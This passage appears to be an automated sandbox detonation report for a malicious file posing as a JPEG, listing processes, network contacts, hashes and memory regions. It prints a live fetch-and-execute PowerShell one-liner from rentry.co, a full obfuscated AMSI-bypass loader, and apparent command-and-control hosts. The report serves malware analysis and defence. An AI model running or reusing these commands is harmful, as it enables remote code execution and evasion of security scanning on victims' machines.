PID 1144 wrote to memory of 2372 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2400 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2608 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2668 N/A C:\Windows\System32\dllhost.exe C:\Windows\sysmon.exe
PID 1144 wrote to memory of 2688 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2712 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2768 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 2848 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\wbem\unsecapp.exe
PID 1144 wrote to memory of 3192 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\sihost.exe
PID 1144 wrote to memory of 3208 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 3288 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\taskhostw.exe
PID 1144 wrote to memory of 3328 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe
PID 1144 wrote to memory of 3472 N/A C:\Windows\System32\dllhost.exe C:\Windows\Explorer.EXE
PID 1144 wrote to memory of 3972 N/A C:\Windows\System32\dllhost.exe C:\Windows\System32\RuntimeBroker.exe
PID 1144 wrote to memory of 4192 N/A C:\Windows\System32\dllhost.exe C:\Windows\system32\DllHost.exe
PID 1144 wrote to memory of 5004 N/A C:\Windows\System32\dllhost.exe c:\windows\system32\svchost.exe

Processes

C:\Windows\system32\winlogon.exe

winlogon.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsass.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k dcomlaunch -s LSM

C:\Windows\system32\dwm.exe

"dwm.exe"

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s gpsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Schedule

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s nsi

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Themes

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s EventSystem

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s UserManager

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s SENS

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s NlaSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s Dnscache

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s netprofm

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s StateRepository

C:\Windows\System32\spoolsv.exe

C:\Windows\System32\spoolsv.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservicenetworkrestricted -s PolicyAgent

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k networkservice -s CryptSvc

C:\Windows\sysmon.exe

C:\Windows\sysmon.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s TrkWks

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s WpnService

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s Browser

C:\Windows\system32\wbem\unsecapp.exe

C:\Windows\system32\wbem\unsecapp.exe -Embedding

c:\windows\system32\sihost.exe

sihost.exe

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k unistacksvcgroup -s CDPUserSvc

c:\windows\system32\taskhostw.exe

taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s TokenBroker

C:\Windows\Explorer.EXE

C:\Windows\Explorer.EXE

C:\Windows\System32\RuntimeBroker.exe

C:\Windows\System32\RuntimeBroker.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localservice -s CDPSvc

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s SSDPSRV

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalService -s WinHttpAutoProxySvc

C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe

"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service

c:\windows\system32\svchost.exe

c:\windows\system32\svchost.exe -k netsvcs -s wlidsvc

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}

C:\Windows\system32\ApplicationFrameHost.exe

C:\Windows\system32\ApplicationFrameHost.exe -Embedding

C:\Windows\System32\InstallAgent.exe

C:\Windows\System32\InstallAgent.exe -Embedding

C:\Windows\system32\DllHost.exe

C:\Windows\system32\DllHost.exe /Processid:{973D20D7-562D-44B9-B70B-5A0F49CCDF3F}

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\system32\cmd.exe

"C:\Windows\system32\cmd.exe"

C:\Windows\System32\Conhost.exe

\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Powershell "irm rentry.co/el3rabtweakpc/raw | iex"

C:\Windows\svchost32.exe

"C:\Windows\svchost32.exe"

C:\Windows\system32\wbem\wmiprvse.exe

C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding

C:\Users\Admin\AppData\Local\Temp\x4s.exe

"C:\Users\Admin\AppData\Local\Temp\x4s.exe"

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

"C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:ybxQbqPPqoYg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WDfCEqZRWGcESM,[Parameter(Position=1)][Type]$PxFmnEbHWK)$swnuMCPOZbb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+'e'+'f'+[Char](108)+'ec'+'t'+''+'e'+''+[Char](100)+''+[Char](68)+'ele'+'g'+'a'+[Char](116)+''+'e'+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+'I'+'nM'+'e'+''+'m'+''+[Char](111)+''+[Char](114)+''+[Char](121)+''+[Char](77)+'o'+[Char](100)+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+'M'+''+[Char](121)+''+[Char](68)+''+'e'+''+'l'+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+'e'+''+[Char](84)+''+[Char](121)+'p'+[Char](101)+'',''+'C'+''+[Char](108)+''+[Char](97)+''+'s'+'s,P'+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+'S'+''+'e'+''+'a'+''+[Char](108)+''+[Char](101)+''+'d'+''+[Char](44)+''+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+'l'+''+'a'+''+[Char](115)+''+'s'+''+[Char](44)+''+'A'+''+'u'+''+'t'+''+'o'+'Cl'+'a'+''+[Char](115)+''+[Char](115)+'',[MulticastDelegate]);$swnuMCPOZbb.DefineConstructor(''+[Char](82)+'T'+'S'+'p'+[Char](101)+''+[Char](99)+''+'i'+''+[Char](97)+''+'l'+'N'+[Char](97)+''+[Char](109)+''+'e'+','+[Char](72)+''+'i'+''+[Char](100)+'e'+[Char](66)+'y'+'S'+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+'b'+[Char](108)+''+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$WDfCEqZRWGcESM).SetImplementationFlags(''+[Char](82)+''+'u'+'n'+[Char](116)+''+'i'+''+[Char](109)+''+'e'+','+[Char](77)+''+'a'+''+[Char](110)+''+[Char](97)+''+[Char](103)+''+[Char](101)+''+'d'+'');$swnuMCPOZbb.DefineMethod(''+[Char](73)+''+'n'+''+[Char](118)+'o'+'k'+''+[Char](101)+'',''+'P'+''+[Char](117)+''+[Char](98)+'li'+'c'+''+','+''+[Char](72)+'i'+[Char](100)+''+'e'+''+'B'+'y'+[Char](83)+''+[Char](105)+''+'g'+',N'+[Char](101)+'w'+[Char](83)+'l'+[Char](111)+''+[Char](116)+''+[Char](44)+''+[Char](86)+''+[Char](105)+'r'+[Char](116)+'ua'+[Char](108)+'',$PxFmnEbHWK,$WDfCEqZRWGcESM).SetImplementationFlags('R'+'u'+''+[Char](110)+'t'+'i'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+'an'+'a'+''+[Char](103)+'e'+[Char](100)+'');Write-Output $swnuMCPOZbb.CreateType();}$CPHeOstWDqdBn=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+'S'+''+'y'+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+'.'+''+[Char](100)+'ll')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+'ro'+'s'+''+[Char](111)+''+[Char](102)+'t.'+[Char](87)+'i'+'n'+''+[Char](51)+''+'2'+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+''+'a'+''+[Char](102)+''+'e'+''+[Char](78)+'a'+'t'+''+[Char](105)+''+'v'+''+[Char](101)+''+'M'+''+'e'+''+'t'+'h'+[Char](111)+'d'+[Char](115)+'');$hexbTqdmsQPcYh=$CPHeOstWDqdBn.GetMethod(''+'G'+''+'e'+''+[Char](116)+''+'P'+''+[Char](114)+'o'+[Char](99)+'A'+'d'+''+[Char](100)+''+[Char](114)+''+[Char](101)+''+[Char](115)+''+'s'+'',[Reflection.BindingFlags](''+[Char](80)+''+'u'+''+[Char](98)+''+'l'+''+[Char](105)+''+[Char](99)+''+[Char](44)+''+'S'+'t'+[Char](97)+''+[Char](116)+''+[Char](105)+''+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$FnJtYGCxuzgYKtDhNgN=ybxQbqPPqoYg @([String])([IntPtr]);$PTiTflNLjCNTEnSIDqGERg=ybxQbqPPqoYg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$XrRDINIblKc=$CPHeOstWDqdBn.GetMethod(''+'G'+''+[Char](101)+''+[Char](116)+''+[Char](77)+''+'o'+''+[Char](100)+''+[Char](117)+''+[Char](108)+'e'+'H'+''+[Char](97)+''+'n'+'d'+[Char](108)+'e').Invoke($Null,@([Object](''+[Char](107)+''+[Char](101)+'r'+[Char](110)+'e'+[Char](108)+''+'3'+''+[Char](50)+'.'+[Char](100)+''+[Char](108)+''+'l'+'')));$qaEtVnalTgnobk=$hexbTqdmsQPcYh.Invoke($Null,@([Object]$XrRDINIblKc,[Object](''+'L'+''+'o'+'ad'+[Char](76)+'i'+[Char](98)+'r'+[Char](97)+''+[Char](114)+'yA')));$aHePNBOabitcjjMAm=$hexbTqdmsQPcYh.Invoke($Null,@([Object]$XrRDINIblKc,[Object](''+[Char](86)+''+'i'+'r'+'t'+''+'u'+'al'+[Char](80)+''+[Char](114)+''+[Char](111)+''+[Char](116)+''+[Char](101)+''+[Char](99)+''+'t'+'')));$eWJNFpB=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($qaEtVnalTgnobk,$FnJtYGCxuzgYKtDhNgN).Invoke(''+[Char](97)+'m'+[Char](115)+'i'+[Char](46)+''+[Char](100)+''+[Char](108)+''+[Char](108)+'');$NdSuqciYcnScrxixT=$hexbTqdmsQPcYh.Invoke($Null,@([Object]$eWJNFpB,[Object](''+[Char](65)+''+[Char](109)+''+[Char](115)+''+'i'+'S'+[Char](99)+'an'+[Char](66)+'u'+[Char](102)+''+[Char](102)+''+[Char](101)+''+'r'+'')));$ViSCkCFGcP=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aHePNBOabitcjjMAm,$PTiTflNLjCNTEnSIDqGERg).Invoke($NdSuqciYcnScrxixT,[uint32]8,4,[ref]$ViSCkCFGcP);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$NdSuqciYcnScrxixT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($aHePNBOabitcjjMAm,$PTiTflNLjCNTEnSIDqGERg).Invoke($NdSuqciYcnScrxixT,[uint32]8,0x20,[ref]$ViSCkCFGcP);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'O'+[Char](70)+''+[Char](84)+''+'W'+''+[Char](65)+''+[Char](82)+''+[Char](69)+'').GetValue(''+'x'+''+'4'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+''+[Char](101)+''+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"

C:\Windows\System32\dllhost.exe

C:\Windows\System32\dllhost.exe /Processid:{6fa664e9-7bf8-4c63-8d48-ffa29244f301}

Network

Country Destination Domain Proto
US 8.8.8.8:53 rentry.co udp
US 104.26.2.16:80 rentry.co tcp
US 104.26.2.16:443 rentry.co tcp
US 8.8.8.8:53 github.com udp
US 8.8.8.8:53 16.2.26.104.in-addr.arpa udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 raw.githubusercontent.com udp
US 185.199.109.133:443 raw.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.109.199.185.in-addr.arpa udp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 23.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 i.ibb.co udp
FR 162.19.58.161:443 i.ibb.co tcp
US 8.8.8.8:53 161.58.19.162.in-addr.arpa udp
US 8.8.8.8:53 news-accept.gl.at.ply.gg udp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 8.8.8.8:53 wiz.bounceme.net udp
US 65.191.34.109:6000 wiz.bounceme.net tcp
US 8.8.8.8:53 wiznon.000webhostapp.com udp
US 145.14.144.50:443 wiznon.000webhostapp.com tcp
US 8.8.8.8:53 50.144.14.145.in-addr.arpa udp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 65.191.34.109:6000 wiz.bounceme.net tcp
US 147.185.221.20:24727 news-accept.gl.at.ply.gg tcp
US 8.8.8.8:53 204.201.50.20.in-addr.arpa udp
US 65.191.34.109:6000 wiz.bounceme.net tcp

Files

memory/4180-4-0x00007FF805060000-0x00007FF80523B000-memory.dmp

memory/4180-6-0x00007FF805060000-0x00007FF80523B000-memory.dmp

memory/4180-5-0x0000018DF0DA0000-0x0000018DF0DC2000-memory.dmp

memory/4180-7-0x00007FF805060000-0x00007FF80523B000-memory.dmp

memory/4180-10-0x0000018DF1400000-0x0000018DF1476000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_yp3owzx3.ajs.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/4180-25-0x00007FF805060000-0x00007FF80523B000-memory.dmp

memory/4180-30-0x0000018DF1B60000-0x0000018DF1D22000-memory.dmp

C:\Windows\svchost32.exe

MD5 de68372979221ee19e301cd657bdb1b6
SHA1 4266ce79f32422735a99259c27749b6d7fbe158e
SHA256 720747405e106709767314b8a58bb754aee0f2bcc568440d757aaab17a181f6a
SHA512 3c80bf8e5dda4a7fb9837e7098f5682651026ba41396fb18221ba96fa61e22961abc22e60760e719ce5300663ba18877aed60bd2106198eb6bf69030ce4fee16

memory/824-49-0x0000000000BE0000-0x0000000000C14000-memory.dmp

memory/4180-50-0x00007FF805060000-0x00007FF80523B000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\x4s.exe

MD5 7d333fbc75b9264d3b631861794a7641
SHA1 165e2b6ad994fe9bab44154e3812b2e8825dfa76
SHA256 b98612934cc154c292502370baca4769f1fccad2c79c17237d23ffd5926180bf
SHA512 54408249ba56c7c19f41c8d35113f306f0fa62c6f5331993945504d09075977346eb40465107d4fab44159a46bd0048d8ea265d31b57d16294420552353175b3

C:\Users\Admin\AppData\Local\Temp\x4Shellcode.exe

MD5 8a7bee2c8cec6ac50bc42fe03d3231e6
SHA1 ebc599a15f061a70f6b3ee74b9acfa4e3b4d299d
SHA256 c8139f7fcde9c68cd331bcd438dfea7f02c463c6372dc477ab305da518483db8
SHA512 34370b6f162cb752b1cb91d689705e6f0f247e02744bbbe85347d20cd89e02aba7c5e9e22bb63acc49b4fdc062de12ccf24f481a18c18d2094e1506bb143cad5

memory/1020-62-0x0000000000960000-0x000000000096E000-memory.dmp

memory/2424-86-0x000001652DE40000-0x000001652DE6A000-memory.dmp

memory/2424-88-0x00007FF8025C0000-0x00007FF80266E000-memory.dmp

memory/2424-87-0x00007FF805060000-0x00007FF80523B000-memory.dmp

memory/1144-92-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1144-91-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1144-90-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1144-89-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1144-97-0x0000000140000000-0x0000000140008000-memory.dmp

memory/1144-99-0x00007FF8025C0000-0x00007FF80266E000-memory.dmp

memory/1144-98-0x00007FF805060000-0x00007FF80523B000-memory.dmp

memory/1144-100-0x0000000140000000-0x0000000140008000-memory.dmp

memory/584-103-0x00000239D2910000-0x00000239D2936000-memory.dmp

memory/584-104-0x00000239D2940000-0x00000239D296C000-memory.dmp

memory/584-105-0x00000239D2940000-0x00000239D296C000-memory.dmp

memory/584-113-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp

memory/584-112-0x00007FFFB8160000-0x00007FFFB8170000-memory.dmp

memory/584-111-0x00000239D2940000-0x00000239D296C000-memory.dmp

memory/640-125-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp

memory/640-124-0x00007FFFB8160000-0x00007FFFB8170000-memory.dmp

memory/640-123-0x000002454A440000-0x000002454A46C000-memory.dmp

memory/640-117-0x000002454A440000-0x000002454A46C000-memory.dmp

memory/736-129-0x00000267CCB00000-0x00000267CCB2C000-memory.dmp

memory/736-137-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp

memory/736-136-0x00007FFFB8160000-0x00007FFFB8170000-memory.dmp

memory/736-135-0x00000267CCB00000-0x00000267CCB2C000-memory.dmp

memory/908-147-0x0000017B0E230000-0x0000017B0E25C000-memory.dmp

memory/908-149-0x00007FF7C50F0000-0x00007FF7C5100000-memory.dmp

memory/908-148-0x00007FFFB8160000-0x00007FFFB8170000-memory.dmp

memory/908-141-0x0000017B0E230000-0x0000017B0E25C000-memory.dmp

memory/1008-153-0x0000020890670000-0x000002089069C000-memory.dmp

memory/1020-820-0x000000001B450000-0x000000001B45E000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:22

Platform

win7-20240508-en

Max time kernel

135s

Max time network

122s

Command Line

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Signatures

N/A

Processes

C:\Windows\System32\rundll32.exe

C:\Windows\System32\rundll32.exe "C:\Program Files\Windows Photo Viewer\PhotoViewer.dll", ImageView_Fullscreen "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe"

Network

N/A

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:22

Platform

win10-20240404-en

Max time kernel

134s

Max time network

138s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Network

Country Destination Domain Proto
US 52.111.227.14:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 4.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 144.107.17.2.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-06-15 09:19

Reported

2024-06-15 09:21

Platform

win10v2004-20240508-en

Max time kernel

92s

Max time network

51s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Signatures

Enumerates physical storage devices

Processes

C:\Windows\system32\cmd.exe

cmd /c "C:\Users\Admin\AppData\Local\Temp\download (1).jpg"

Network

Files

N/A